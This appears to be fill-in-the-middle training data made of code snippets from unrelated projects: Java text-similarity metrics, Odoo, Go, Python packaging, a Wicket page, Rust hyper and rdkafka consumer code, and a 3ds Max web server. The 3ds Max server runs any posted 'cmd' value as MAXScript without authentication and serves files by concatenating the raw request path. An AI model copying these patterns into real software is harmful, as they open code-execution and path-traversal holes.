<|fim▁hole|> }
@Override
public Set<String> getSignatures() {
return itemsFrequency.keySet();
}
@Override
public float getSimilarity(ITextModel oModel) {
switch (simMetric) {
case COSINE_SIMILARITY:
return getTfCosineSimilarity((BagModel) oModel);
case ENHANCED_JACCARD_SIMILARITY:
return getEnhancedJaccardSimilarity((BagModel) oModel);
case GENERALIZED_JACCARD_SIMILARITY:
return getTfGeneralizedJaccardSimilarity((BagModel) oModel);
case JACCARD_SIMILARITY:
return getJaccardSimilarity((BagModel) oModel);
default:
throw new IllegalStateException(
"The given similarity metric is incompatible with the bag representation model.");
}
}
protected float getTfCosineSimilarity(BagModel oModel) {
float totalTerms2 = oModel.getNoOfTotalTerms();
TObjectIntMap<String> itemVector1 = itemsFrequency;
TObjectIntMap<String> itemVector2 = oModel.getItemsFrequency();
if (itemVector2.size() < itemVector1.size()) {
itemVector1 = oModel.getItemsFrequency();
itemVector2 = itemsFrequency;
}
float numerator = 0.0f;
for (TObjectIntIterator<String> iterator = itemVector1.iterator(); iterator.hasNext();) {
iterator.advance();
numerator += iterator.value() * itemVector2.get(iterator.key()) / noOfTotalTerms / totalTerms2;
}
float denominator = getVectorMagnitude() * oModel.getVectorMagnitude();
return numerator / denominator;
}
protected float getTfGeneralizedJaccardSimilarity(BagModel oModel) {
float totalTerms1 = noOfTotalTerms;
float totalTerms2 = oModel.getNoOfTotalTerms();
TObjectIntMap<String> itemVector1 = itemsFrequency;
TObjectIntMap<String> itemVector2 = oModel.getItemsFrequency();
if (itemVector2.size() < itemVector1.size()) {
itemVector1 = oModel.getItemsFrequency();
itemVector2 = itemsFrequency;
totalTerms1 = oModel.getNoOfTotalTerms();
totalTerms2 = noOfTotalTerms;
}
float numerator = 0.0f;
for (TObjectIntIterator<String> iterator = itemVector1.iterator(); iterator.hasNext(); ) {
iterator.advance();
numerator += Math.min(iterator.value() / totalTerms1, itemVector2.get(iterator.key()) / totalTerms2);
}
final Set<String> allKeys = new HashSet<>(itemVector1.keySet());
allKeys.addAll(itemVector2.keySet());
float denominator = 0.0f;
for (String key : allKeys) {
denominator += Math.max(itemVector1.get(key) / totalTerms1, itemVector2.get(key) / totalTerms2);
}
return numerator / denominator;
}
protected float getVectorMagnitude() {
float magnitude = 0.0f;
for (TObjectIntIterator<String> iterator = itemsFrequency.iterator(); iterator.hasNext();) {
iterator.advance();
magnitude += Math.pow(iterator.value() / noOfTotalTerms, 2.0);
}
return (float) Math.sqrt(magnitude);
}
}<|fim▁end|>
|
protected float getNoOfTotalTerms() {
return noOfTotalTerms;
|
<|file_name|>stock_picking.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import models, api, fields<|fim▁hole|>from odoo.tools.translate import _
class StockPicking(models.Model):
_inherit = 'stock.picking'
website_id = fields.Many2one('website', related='sale_id.website_id', string='Website',
help='Website this picking belongs to.',
store=True, readonly=True)<|fim▁end|>
| |
<|file_name|>main.go<|end_file_name|><|fim▁begin|>// Try CodeIQ Q3264
// author: Leonardone @ NEETSDKASU
package main
import (
"fmt"
"strings"
)
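// Solve brackets exact matches, wraps an embedded target in '=' markers,
// and passes all other words through unchanged.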
func Solve(target string, words []string) (ans []string) {
for _, w := range words {
switch {
case w == target:
ans = append(ans, "["+w+"]")
case strings.Contains(w, target):
ans = append(ans, strings.Replace(w, target, "="+target+"=", -1))
default:
ans = append(ans, w)
}
}
return
}
func main() {
var target string
fmt.Scan(&target)
words := make([]string, 0, 100)
for {
var w string
if _, err := fmt.Scan(&w); err != nil {
break
}
words = append(words, w)
}
ans := Solve(target, words)
for i, w := range ans {
if i > 0 {<|fim▁hole|> fmt.Print(w)
}
fmt.Println()
}<|fim▁end|>
|
fmt.Print(" ")
}
|
<|file_name|>setup.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python<|fim▁hole|>from setuptools import setup, find_packages
with open('README.rst') as readme_file:
README = readme_file.read()
with open('HISTORY.rst') as history_file:
HISTORY = history_file.read()
REQUIREMENTS = [
'gitpython',
'requests',
'tqdm',
'requests_cache',
]
TEST_REQUIREMENTS = [
'pytest',
'mock',
]
setup(
name='packyou',
version='0.1.6',
description="Downloads or clones a python project from github and allows to import it from anywhere. Very useful when the repo is not a package",
long_description=README + '\n\n' + HISTORY,
author="Leonardo Lazzaro",
author_email='[email protected]',
url='https://github.com/llazzaro/packyou',
packages=find_packages(),
package_dir={'packyou':
'packyou'},
include_package_data=True,
install_requires=REQUIREMENTS,
license="MIT license",
zip_safe=False,
keywords='packyou',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
"Programming Language :: Python :: 2",
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
],
test_suite='tests',
tests_require=TEST_REQUIREMENTS,
)<|fim▁end|>
|
# -*- coding: utf-8 -*-
|
<|file_name|>ABsgCoachWebPage.java<|end_file_name|><|fim▁begin|>package com.bsgcoach.web;
import javax.annotation.concurrent.NotThreadSafe;
import org.apache.wicket.Page;
import org.apache.wicket.markup.head.CssHeaderItem;
import org.apache.wicket.markup.head.IHeaderResponse;
import org.apache.wicket.markup.head.JavaScriptHeaderItem;
import org.apache.wicket.model.IModel;
import org.apache.wicket.model.Model;<|fim▁hole|>import org.apache.wicket.request.cycle.RequestCycle;
import org.apache.wicket.request.resource.PackageResourceReference;
import org.apache.wicket.request.resource.ResourceReference;
import com.bsgcoach.web.footer.FooterPanel;
import com.bsgcoach.web.guide.RedirectToGuidePage;
import de.agilecoders.wicket.core.markup.html.bootstrap.image.GlyphIconType;
import de.agilecoders.wicket.core.markup.html.bootstrap.navbar.Navbar;
import de.agilecoders.wicket.core.markup.html.bootstrap.navbar.NavbarButton;
import de.agilecoders.wicket.core.markup.html.bootstrap.navbar.NavbarComponents;
import de.agilecoders.wicket.core.markup.html.bootstrap.navbar.NavbarExternalLink;
import de.invesdwin.nowicket.application.AWebPage;
import de.invesdwin.nowicket.application.auth.ABaseWebApplication;
import de.invesdwin.nowicket.application.filter.AWebApplication;
import de.invesdwin.nowicket.component.footer.AFooter;
@NotThreadSafe
public abstract class ABsgCoachWebPage extends AWebPage {
private static final boolean INVERTED_HEADER_AND_FOOTER = true;
private static final ResourceReference LOGO = new PackageResourceReference(ABsgCoachWebPage.class, "logo.png");
private static final PackageResourceReference BACKGROUND = new PackageResourceReference(ABsgCoachWebPage.class,
"bg.jpg");
public ABsgCoachWebPage(final IModel<?> model) {
super(model);
}
@Override
protected Navbar newNavbar(final String id) {
final Navbar navbar = super.newNavbar(id);
navbar.setBrandName(null);
navbar.setBrandImage(LOGO, Model.of("bsg-coach"));
navbar.addComponents(NavbarComponents.transform(Navbar.ComponentPosition.LEFT,
new NavbarButton<Void>(RedirectToGuidePage.class, Model.of("Home")).setIconType(GlyphIconType.home)));
navbar.addComponents(NavbarComponents.transform(Navbar.ComponentPosition.LEFT,
new NavbarButton<Void>(ABaseWebApplication.get().getHomePage(), Model.of("Get Feedback"))
.setIconType(GlyphIconType.upload)));
navbar.addComponents(NavbarComponents.transform(Navbar.ComponentPosition.RIGHT,
new NavbarExternalLink(Model.of("mailto:[email protected]"))
.setLabel(Model.of("Tell us what you think!")).setIconType(GlyphIconType.envelope)));
navbar.setInverted(INVERTED_HEADER_AND_FOOTER);
return navbar;
}
@Override
protected Class<? extends Page> getNavbarHomePage() {
return RedirectToGuidePage.class;
}
@Override
protected AFooter newFooter(final String id) {
return new FooterPanel(id);
}
@Override
public void renderHead(final IHeaderResponse response) {
super.renderHead(response);
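        // Inline CSS: fixed, centered full-page background image with a
        // translucent navbar and footer.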
final StringBuilder bgCss = new StringBuilder();
bgCss.append("body {\n");
bgCss.append(" background: url(");
bgCss.append(RequestCycle.get().urlFor(BACKGROUND, null));
bgCss.append(") no-repeat center center fixed;\n");
bgCss.append("}\n");
bgCss.append("nav {\n");
bgCss.append(" opacity: 0.75;\n");
bgCss.append("}\n");
bgCss.append(".footer .panel-footer {\n");
bgCss.append(" background-color: #222;\n");
bgCss.append(" border-color: #080808;\n");
bgCss.append(" opacity: 0.75;\n");
bgCss.append("}\n");
response.render(CssHeaderItem.forCSS(bgCss, "bsgBgCss"));
if (AWebApplication.get().usesDeploymentConfig()) {
//CHECKSTYLE:OFF fdate
response.render(JavaScriptHeaderItem
.forScript("(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){" //
+ "(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o)," //
+ "m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)" //
+ "})(window,document,'script','//www.google-analytics.com/analytics.js','ga');" //
+ "ga('create', 'UA-75774568-1', 'auto');" //
+ "ga('send', 'pageview');", "googleAnalytics"));
//CHECKSTYLE:ON
}
}
}<|fim▁end|>
| |
<|file_name|>io.rs<|end_file_name|><|fim▁begin|>extern crate hyper;
extern crate par;
use std::io::{self, Read};
use hyper::Client;
use hyper::header::{ContentLength, Connection, UserAgent};
use par::{Bar, Reader};
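// Fetch a URL with hyper and wrap the response in a progress-bar `Reader`
// sized from the Content-Length header.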
fn main() {
let client = Client::new();
let mut res = client.get("https://api.github.com/users/softprops/repos")
.header(Connection::close())
.header(UserAgent(String::from("par/0.1.0")))
.send().unwrap();<|fim▁hole|> if let Some(&ContentLength(len)) = res.headers.clone().get::<ContentLength>() {
let mut bar = Bar::new(len as usize);
bar.units = par::Units::Bytes;
let mut proxy = Reader::new(res, bar);
let mut buf = String::new();
proxy.read_to_string(&mut buf);
};
}<|fim▁end|>
| |
<|file_name|>simplewebserver.py<|end_file_name|><|fim▁begin|>import BaseHTTPServer
import cgi
import ctypes
import os
import sys
import threading
from PySide import QtGui
import MaxPlus
PORT = 8000
class MyThread(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.exiting = False
address = ('localhost', PORT)
self.server = BaseHTTPServer.HTTPServer(address, MyHandler)
self._stop = threading.Event()
def run(self):
self.server.serve_forever()
def stop(self):
self.server.server_close()
self.server.shutdown()
self._stop.set()
class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(self):
        rootdir = os.path.join(os.path.dirname(__file__), 'html')
try:
if self.path == '/':
self.path = '/index.html'
if self.path.endswith('.html'):
self.send_response(200)
                self.send_header('Content-type', 'text/html')
self.end_headers()
f = open(rootdir + self.path)
self.wfile.write(f.read())
f.close()
return
except IOError:
self.send_error(404, 'file not found')
def do_POST(self):
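        # Parse the posted form and evaluate its "cmd" field as MAXScript in
        # the running 3ds Max instance, then redirect the client back to "/".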
if self.path=="/cmd":
form = cgi.FieldStorage(
fp=self.rfile,
headers=self.headers,
environ={'REQUEST_METHOD':'POST',
'CONTENT_TYPE':self.headers['Content-Type'],
})
self.send_response(301)
self.send_header('Location', '/')
self.end_headers()
try:
MaxPlus.Core.EvalMAXScript(form["cmd"].value)
MaxPlus.ViewportManager_ForceCompleteRedraw()
except:
print "Needs to be run from a 3ds max instance"
return
class MyWindow(QtGui.QWidget):
def __init__(self, parent=None):
super(MyWindow, self).__init__(parent)
self.setWindowTitle('Simple 3ds Max webserver')
self.resize(200,50)
self.btn_run = QtGui.QPushButton('Run')
layout = QtGui.QVBoxLayout()
layout.addWidget(self.btn_run)
self.setLayout(layout)
self.btn_run.clicked.connect(self.run)
self.serverThread = None
def run(self):
if not self.serverThread:
print "Serving at port", PORT
self.btn_run.setText('Stop...')
self.serverThread = MyThread()
self.serverThread.start()
else:
print "Stopping webserver"
self.btn_run.setText('Run')
self.serverThread.stop()
self.serverThread = None
def closeEvent(self, *args, **kwargs):
if self.serverThread:
print "Stopping webserver"
self.btn_run.setText('Run')
self.serverThread.stop()
self.serverThread = None<|fim▁hole|>class _GCProtector(object):
controls = []
if __name__ == '__main__':
app = QtGui.QApplication.instance()
if not app:
app = QtGui.QApplication([])
window = MyWindow()
_GCProtector.controls.append(window)
window.show()
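    # Convert the PySide window-handle capsule to a raw pointer so 3ds Max
    # can be set as the parent window.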
capsule = window.effectiveWinId()
ctypes.pythonapi.PyCObject_AsVoidPtr.restype = ctypes.c_void_p
ctypes.pythonapi.PyCObject_AsVoidPtr.argtypes = [ctypes.py_object]
ptr = ctypes.pythonapi.PyCObject_AsVoidPtr(capsule)
MaxPlus.Win32.Set3dsMaxAsParentWindow(ptr)<|fim▁end|>
| |
<|file_name|>backends.py<|end_file_name|><|fim▁begin|>from django.contrib.auth.backends import ModelBackend
# Live sessions will still be using this backend for a while.
# TODO: Remove after there are no more sessions using this in prod.
class Sha256Backend(ModelBackend):
"""Overriding the Django model backend without changes."""
<|fim▁hole|><|fim▁end|>
|
pass
|
<|file_name|>base_consumer.rs<|end_file_name|><|fim▁begin|>//! Low-level consumers.
use std::cmp;
use std::ffi::CString;
use std::mem::ManuallyDrop;
use std::os::raw::c_void;
use std::ptr;
use std::sync::Arc;
use rdkafka_sys as rdsys;
use rdkafka_sys::types::*;
use crate::client::{Client, NativeClient, NativeQueue};
use crate::config::{
ClientConfig, FromClientConfig, FromClientConfigAndContext, NativeClientConfig,
};
use crate::consumer::{
CommitMode, Consumer, ConsumerContext, ConsumerGroupMetadata, DefaultConsumerContext,
RebalanceProtocol,
};
use crate::error::{IsError, KafkaError, KafkaResult};
use crate::groups::GroupList;
use crate::log::trace;
use crate::message::{BorrowedMessage, Message};
use crate::metadata::Metadata;
use crate::topic_partition_list::{Offset, TopicPartitionList};
use crate::util::{cstr_to_owned, NativePtr, Timeout};
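// Native commit callback: converts the raw librdkafka result and offset list
// into safe types and forwards them to `ConsumerContext::commit_callback`.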
pub(crate) unsafe extern "C" fn native_commit_cb<C: ConsumerContext>(
_conf: *mut RDKafka,
err: RDKafkaRespErr,
offsets: *mut RDKafkaTopicPartitionList,
opaque_ptr: *mut c_void,
) {
let context = &mut *(opaque_ptr as *mut C);
let commit_error = if err.is_error() {
Err(KafkaError::ConsumerCommit(err.into()))
} else {
Ok(())
};
if offsets.is_null() {
let tpl = TopicPartitionList::new();
context.commit_callback(commit_error, &tpl);
} else {
let tpl = ManuallyDrop::new(TopicPartitionList::from_ptr(offsets));
context.commit_callback(commit_error, &tpl);
}
}
/// Native rebalance callback. This callback will run on every rebalance, and it will call the
/// rebalance method defined in the current `Context`.
unsafe extern "C" fn native_rebalance_cb<C: ConsumerContext>(
rk: *mut RDKafka,
err: RDKafkaRespErr,
native_tpl: *mut RDKafkaTopicPartitionList,
opaque_ptr: *mut c_void,
) {
let context = &mut *(opaque_ptr as *mut C);
let native_client = ManuallyDrop::new(NativeClient::from_ptr(rk));
let mut tpl = ManuallyDrop::new(TopicPartitionList::from_ptr(native_tpl));
context.rebalance(&native_client, err, &mut tpl);
}
/// A low-level consumer that requires manual polling.
///
/// This consumer must be periodically polled to make progress on rebalancing,
/// callbacks and to receive messages.
pub struct BaseConsumer<C = DefaultConsumerContext>
where
C: ConsumerContext,
{
client: Client<C>,
main_queue_min_poll_interval: Timeout,
}
impl FromClientConfig for BaseConsumer {
fn from_config(config: &ClientConfig) -> KafkaResult<BaseConsumer> {
BaseConsumer::from_config_and_context(config, DefaultConsumerContext)
}
}
/// Creates a new `BaseConsumer` starting from a `ClientConfig`.
impl<C: ConsumerContext> FromClientConfigAndContext<C> for BaseConsumer<C> {
fn from_config_and_context(config: &ClientConfig, context: C) -> KafkaResult<BaseConsumer<C>> {
BaseConsumer::new(config, config.create_native_config()?, context)
}
}
impl<C> BaseConsumer<C>
where
C: ConsumerContext,
{
pub(crate) fn new(
config: &ClientConfig,
native_config: NativeClientConfig,
context: C,
) -> KafkaResult<BaseConsumer<C>> {
unsafe {
rdsys::rd_kafka_conf_set_rebalance_cb(
native_config.ptr(),
Some(native_rebalance_cb::<C>),
);
rdsys::rd_kafka_conf_set_offset_commit_cb(
native_config.ptr(),
Some(native_commit_cb::<C>),
);
}
let main_queue_min_poll_interval = context.main_queue_min_poll_interval();
let client = Client::new(
config,
native_config,
RDKafkaType::RD_KAFKA_CONSUMER,
context,
)?;
Ok(BaseConsumer {
client,
main_queue_min_poll_interval,
})
}
/// Polls the consumer for messages and returns a pointer to the native rdkafka-sys struct.
/// This method is for internal use only. Use poll instead.
pub(crate) fn poll_raw(&self, mut timeout: Timeout) -> Option<NativePtr<RDKafkaMessage>> {
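        // Serve callbacks on the main queue, then poll the consumer queue in
        // slices no longer than `main_queue_min_poll_interval`.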
loop {
unsafe { rdsys::rd_kafka_poll(self.client.native_ptr(), 0) };
let op_timeout = cmp::min(timeout, self.main_queue_min_poll_interval);
let message_ptr = unsafe {
NativePtr::from_ptr(rdsys::rd_kafka_consumer_poll(
self.client.native_ptr(),
op_timeout.as_millis(),
))
};
if let Some(message_ptr) = message_ptr {
break Some(message_ptr);
}
if op_timeout >= timeout {
break None;
}
timeout -= op_timeout;
}
}
/// Polls the consumer for new messages.
///
    /// It won't block for more than the specified timeout. Use a zero `Duration` for a
    /// non-blocking call. With no timeout it blocks until an event is received.
///
/// This method should be called at regular intervals, even if no message is expected,
/// to serve any queued callbacks waiting to be called. This is especially important for
/// automatic consumer rebalance, as the rebalance function will be executed by the thread
/// calling the poll() function.
///
/// # Lifetime
///
/// The returned message lives in the memory of the consumer and cannot outlive it.
pub fn poll<T: Into<Timeout>>(&self, timeout: T) -> Option<KafkaResult<BorrowedMessage<'_>>> {
self.poll_raw(timeout.into())
.map(|ptr| unsafe { BorrowedMessage::from_consumer(ptr, self) })
}
/// Returns an iterator over the available messages.
///
/// It repeatedly calls [`poll`](#method.poll) with no timeout.
///
/// Note that it's also possible to iterate over the consumer directly.
///
/// # Examples
///
/// All these are equivalent and will receive messages without timing out.
///<|fim▁hole|> /// # .create()
/// # .unwrap();
/// #
/// loop {
/// let message = consumer.poll(None);
/// // Handle the message
/// }
/// ```
///
/// ```rust,no_run
/// # let consumer: rdkafka::consumer::BaseConsumer<_> = rdkafka::ClientConfig::new()
/// # .create()
/// # .unwrap();
/// #
/// for message in consumer.iter() {
/// // Handle the message
/// }
/// ```
///
/// ```rust,no_run
/// # let consumer: rdkafka::consumer::BaseConsumer<_> = rdkafka::ClientConfig::new()
/// # .create()
/// # .unwrap();
/// #
/// for message in &consumer {
/// // Handle the message
/// }
/// ```
pub fn iter(&self) -> Iter<'_, C> {
Iter(self)
}
/// Splits messages for the specified partition into their own queue.
///
/// If the `topic` or `partition` is invalid, returns `None`.
///
/// After calling this method, newly-fetched messages for the specified
/// partition will be returned via [`PartitionQueue::poll`] rather than
/// [`BaseConsumer::poll`]. Note that there may be buffered messages for the
/// specified partition that will continue to be returned by
/// `BaseConsumer::poll`. For best results, call `split_partition_queue`
/// before the first call to `BaseConsumer::poll`.
///
/// You must continue to call `BaseConsumer::poll`, even if no messages are
/// expected, to serve callbacks.
///
/// Note that calling [`Consumer::assign`] will deactivate any existing
/// partition queues. You will need to call this method for every partition
/// that should be split after every call to `assign`.
///
/// Beware that this method is implemented for `&Arc<Self>`, not `&self`.
/// You will need to wrap your consumer in an `Arc` in order to call this
/// method. This design permits moving the partition queue to another thread
/// while ensuring the partition queue does not outlive the consumer.
pub fn split_partition_queue(
self: &Arc<Self>,
topic: &str,
partition: i32,
) -> Option<PartitionQueue<C>> {
let topic = match CString::new(topic) {
Ok(topic) => topic,
Err(_) => return None,
};
let queue = unsafe {
NativeQueue::from_ptr(rdsys::rd_kafka_queue_get_partition(
self.client.native_ptr(),
topic.as_ptr(),
partition,
))
};
queue.map(|queue| {
unsafe { rdsys::rd_kafka_queue_forward(queue.ptr(), ptr::null_mut()) }
PartitionQueue::new(self.clone(), queue)
})
}
}
impl<C> Consumer<C> for BaseConsumer<C>
where
C: ConsumerContext,
{
fn client(&self) -> &Client<C> {
&self.client
}
fn group_metadata(&self) -> Option<ConsumerGroupMetadata> {
let ptr = unsafe {
NativePtr::from_ptr(rdsys::rd_kafka_consumer_group_metadata(
self.client.native_ptr(),
))
}?;
Some(ConsumerGroupMetadata(ptr))
}
fn subscribe(&self, topics: &[&str]) -> KafkaResult<()> {
let mut tpl = TopicPartitionList::new();
for topic in topics {
tpl.add_topic_unassigned(topic);
}
let ret_code = unsafe { rdsys::rd_kafka_subscribe(self.client.native_ptr(), tpl.ptr()) };
if ret_code.is_error() {
let error = unsafe { cstr_to_owned(rdsys::rd_kafka_err2str(ret_code)) };
return Err(KafkaError::Subscription(error));
};
Ok(())
}
fn unsubscribe(&self) {
unsafe { rdsys::rd_kafka_unsubscribe(self.client.native_ptr()) };
}
fn assign(&self, assignment: &TopicPartitionList) -> KafkaResult<()> {
let ret_code =
unsafe { rdsys::rd_kafka_assign(self.client.native_ptr(), assignment.ptr()) };
if ret_code.is_error() {
let error = unsafe { cstr_to_owned(rdsys::rd_kafka_err2str(ret_code)) };
return Err(KafkaError::Subscription(error));
};
Ok(())
}
fn seek<T: Into<Timeout>>(
&self,
topic: &str,
partition: i32,
offset: Offset,
timeout: T,
) -> KafkaResult<()> {
let topic = self.client.native_topic(topic)?;
let ret_code = match offset.to_raw() {
Some(offset) => unsafe {
rdsys::rd_kafka_seek(topic.ptr(), partition, offset, timeout.into().as_millis())
},
None => return Err(KafkaError::Seek("Local: Unrepresentable offset".into())),
};
if ret_code.is_error() {
let error = unsafe { cstr_to_owned(rdsys::rd_kafka_err2str(ret_code)) };
return Err(KafkaError::Seek(error));
};
Ok(())
}
fn commit(
&self,
topic_partition_list: &TopicPartitionList,
mode: CommitMode,
) -> KafkaResult<()> {
let error = unsafe {
rdsys::rd_kafka_commit(
self.client.native_ptr(),
topic_partition_list.ptr(),
mode as i32,
)
};
if error.is_error() {
Err(KafkaError::ConsumerCommit(error.into()))
} else {
Ok(())
}
}
fn commit_consumer_state(&self, mode: CommitMode) -> KafkaResult<()> {
let error = unsafe {
rdsys::rd_kafka_commit(self.client.native_ptr(), ptr::null_mut(), mode as i32)
};
if error.is_error() {
Err(KafkaError::ConsumerCommit(error.into()))
} else {
Ok(())
}
}
fn commit_message(&self, message: &BorrowedMessage<'_>, mode: CommitMode) -> KafkaResult<()> {
let error = unsafe {
rdsys::rd_kafka_commit_message(self.client.native_ptr(), message.ptr(), mode as i32)
};
if error.is_error() {
Err(KafkaError::ConsumerCommit(error.into()))
} else {
Ok(())
}
}
fn store_offset(&self, topic: &str, partition: i32, offset: i64) -> KafkaResult<()> {
let topic = self.client.native_topic(topic)?;
let error = unsafe { rdsys::rd_kafka_offset_store(topic.ptr(), partition, offset) };
if error.is_error() {
Err(KafkaError::StoreOffset(error.into()))
} else {
Ok(())
}
}
fn store_offset_from_message(&self, message: &BorrowedMessage<'_>) -> KafkaResult<()> {
let error = unsafe {
rdsys::rd_kafka_offset_store(message.topic_ptr(), message.partition(), message.offset())
};
if error.is_error() {
Err(KafkaError::StoreOffset(error.into()))
} else {
Ok(())
}
}
fn store_offsets(&self, tpl: &TopicPartitionList) -> KafkaResult<()> {
let error = unsafe { rdsys::rd_kafka_offsets_store(self.client.native_ptr(), tpl.ptr()) };
if error.is_error() {
Err(KafkaError::StoreOffset(error.into()))
} else {
Ok(())
}
}
fn subscription(&self) -> KafkaResult<TopicPartitionList> {
let mut tpl_ptr = ptr::null_mut();
let error = unsafe { rdsys::rd_kafka_subscription(self.client.native_ptr(), &mut tpl_ptr) };
if error.is_error() {
Err(KafkaError::MetadataFetch(error.into()))
} else {
Ok(unsafe { TopicPartitionList::from_ptr(tpl_ptr) })
}
}
fn assignment(&self) -> KafkaResult<TopicPartitionList> {
let mut tpl_ptr = ptr::null_mut();
let error = unsafe { rdsys::rd_kafka_assignment(self.client.native_ptr(), &mut tpl_ptr) };
if error.is_error() {
Err(KafkaError::MetadataFetch(error.into()))
} else {
Ok(unsafe { TopicPartitionList::from_ptr(tpl_ptr) })
}
}
fn committed<T: Into<Timeout>>(&self, timeout: T) -> KafkaResult<TopicPartitionList> {
let mut tpl_ptr = ptr::null_mut();
let assignment_error =
unsafe { rdsys::rd_kafka_assignment(self.client.native_ptr(), &mut tpl_ptr) };
if assignment_error.is_error() {
return Err(KafkaError::MetadataFetch(assignment_error.into()));
}
self.committed_offsets(unsafe { TopicPartitionList::from_ptr(tpl_ptr) }, timeout)
}
fn committed_offsets<T: Into<Timeout>>(
&self,
tpl: TopicPartitionList,
timeout: T,
) -> KafkaResult<TopicPartitionList> {
let committed_error = unsafe {
rdsys::rd_kafka_committed(
self.client.native_ptr(),
tpl.ptr(),
timeout.into().as_millis(),
)
};
if committed_error.is_error() {
Err(KafkaError::MetadataFetch(committed_error.into()))
} else {
Ok(tpl)
}
}
fn offsets_for_timestamp<T: Into<Timeout>>(
&self,
timestamp: i64,
timeout: T,
) -> KafkaResult<TopicPartitionList> {
let mut tpl_ptr = ptr::null_mut();
let assignment_error =
unsafe { rdsys::rd_kafka_assignment(self.client.native_ptr(), &mut tpl_ptr) };
if assignment_error.is_error() {
return Err(KafkaError::MetadataFetch(assignment_error.into()));
}
let mut tpl = unsafe { TopicPartitionList::from_ptr(tpl_ptr) };
// Set the timestamp we want in the offset field for every partition as
// librdkafka expects.
tpl.set_all_offsets(Offset::Offset(timestamp))?;
self.offsets_for_times(tpl, timeout)
}
// `timestamps` is a `TopicPartitionList` with timestamps instead of
// offsets.
fn offsets_for_times<T: Into<Timeout>>(
&self,
timestamps: TopicPartitionList,
timeout: T,
) -> KafkaResult<TopicPartitionList> {
// This call will then put the offset in the offset field of this topic
// partition list.
let offsets_for_times_error = unsafe {
rdsys::rd_kafka_offsets_for_times(
self.client.native_ptr(),
timestamps.ptr(),
timeout.into().as_millis(),
)
};
if offsets_for_times_error.is_error() {
Err(KafkaError::MetadataFetch(offsets_for_times_error.into()))
} else {
Ok(timestamps)
}
}
fn position(&self) -> KafkaResult<TopicPartitionList> {
let tpl = self.assignment()?;
let error = unsafe { rdsys::rd_kafka_position(self.client.native_ptr(), tpl.ptr()) };
if error.is_error() {
Err(KafkaError::MetadataFetch(error.into()))
} else {
Ok(tpl)
}
}
fn fetch_metadata<T: Into<Timeout>>(
&self,
topic: Option<&str>,
timeout: T,
) -> KafkaResult<Metadata> {
self.client.fetch_metadata(topic, timeout)
}
fn fetch_watermarks<T: Into<Timeout>>(
&self,
topic: &str,
partition: i32,
timeout: T,
) -> KafkaResult<(i64, i64)> {
self.client.fetch_watermarks(topic, partition, timeout)
}
fn fetch_group_list<T: Into<Timeout>>(
&self,
group: Option<&str>,
timeout: T,
) -> KafkaResult<GroupList> {
self.client.fetch_group_list(group, timeout)
}
fn pause(&self, partitions: &TopicPartitionList) -> KafkaResult<()> {
let ret_code =
unsafe { rdsys::rd_kafka_pause_partitions(self.client.native_ptr(), partitions.ptr()) };
if ret_code.is_error() {
let error = unsafe { cstr_to_owned(rdsys::rd_kafka_err2str(ret_code)) };
return Err(KafkaError::PauseResume(error));
};
Ok(())
}
fn resume(&self, partitions: &TopicPartitionList) -> KafkaResult<()> {
let ret_code = unsafe {
rdsys::rd_kafka_resume_partitions(self.client.native_ptr(), partitions.ptr())
};
if ret_code.is_error() {
let error = unsafe { cstr_to_owned(rdsys::rd_kafka_err2str(ret_code)) };
return Err(KafkaError::PauseResume(error));
};
Ok(())
}
fn rebalance_protocol(&self) -> RebalanceProtocol {
self.client.native_client().rebalance_protocol()
}
}
impl<C> Drop for BaseConsumer<C>
where
C: ConsumerContext,
{
fn drop(&mut self) {
trace!("Destroying consumer: {:?}", self.client.native_ptr()); // TODO: fix me (multiple executions ?)
unsafe { rdsys::rd_kafka_consumer_close(self.client.native_ptr()) };
trace!("Consumer destroyed: {:?}", self.client.native_ptr());
}
}
/// A convenience iterator over the messages in a [`BaseConsumer`].
///
/// Each call to [`Iter::next`] simply calls [`BaseConsumer::poll`] with an
/// infinite timeout.
pub struct Iter<'a, C>(&'a BaseConsumer<C>)
where
C: ConsumerContext;
impl<'a, C> Iterator for Iter<'a, C>
where
C: ConsumerContext,
{
type Item = KafkaResult<BorrowedMessage<'a>>;
fn next(&mut self) -> Option<Self::Item> {
loop {
if let Some(item) = self.0.poll(None) {
return Some(item);
}
}
}
}
impl<'a, C> IntoIterator for &'a BaseConsumer<C>
where
C: ConsumerContext,
{
type Item = KafkaResult<BorrowedMessage<'a>>;
type IntoIter = Iter<'a, C>;
fn into_iter(self) -> Self::IntoIter {
self.iter()
}
}
/// A message queue for a single partition.
pub struct PartitionQueue<C>
where
C: ConsumerContext,
{
consumer: Arc<BaseConsumer<C>>,
queue: NativeQueue,
nonempty_callback: Option<Box<Box<dyn Fn() + Send + Sync>>>,
}
impl<C> PartitionQueue<C>
where
C: ConsumerContext,
{
pub(crate) fn new(consumer: Arc<BaseConsumer<C>>, queue: NativeQueue) -> Self {
PartitionQueue {
consumer,
queue,
nonempty_callback: None,
}
}
/// Polls the partition for new messages.
///
/// The `timeout` parameter controls how long to block if no messages are
/// available.
///
/// Remember that you must also call [`BaseConsumer::poll`] on the
/// associated consumer regularly, even if no messages are expected, to
/// serve callbacks.
pub fn poll<T: Into<Timeout>>(&self, timeout: T) -> Option<KafkaResult<BorrowedMessage<'_>>> {
unsafe {
NativePtr::from_ptr(rdsys::rd_kafka_consume_queue(
self.queue.ptr(),
timeout.into().as_millis(),
))
}
.map(|ptr| unsafe { BorrowedMessage::from_consumer(ptr, &self.consumer) })
}
/// Sets a callback that will be invoked whenever the queue becomes
/// nonempty.
pub fn set_nonempty_callback<F>(&mut self, f: F)
where
F: Fn() + Send + Sync + 'static,
{
// SAFETY: we keep `F` alive until the next call to
// `rd_kafka_queue_cb_event_enable`. That might be the next call to
// `set_nonempty_callback` or it might be when the queue is dropped. The
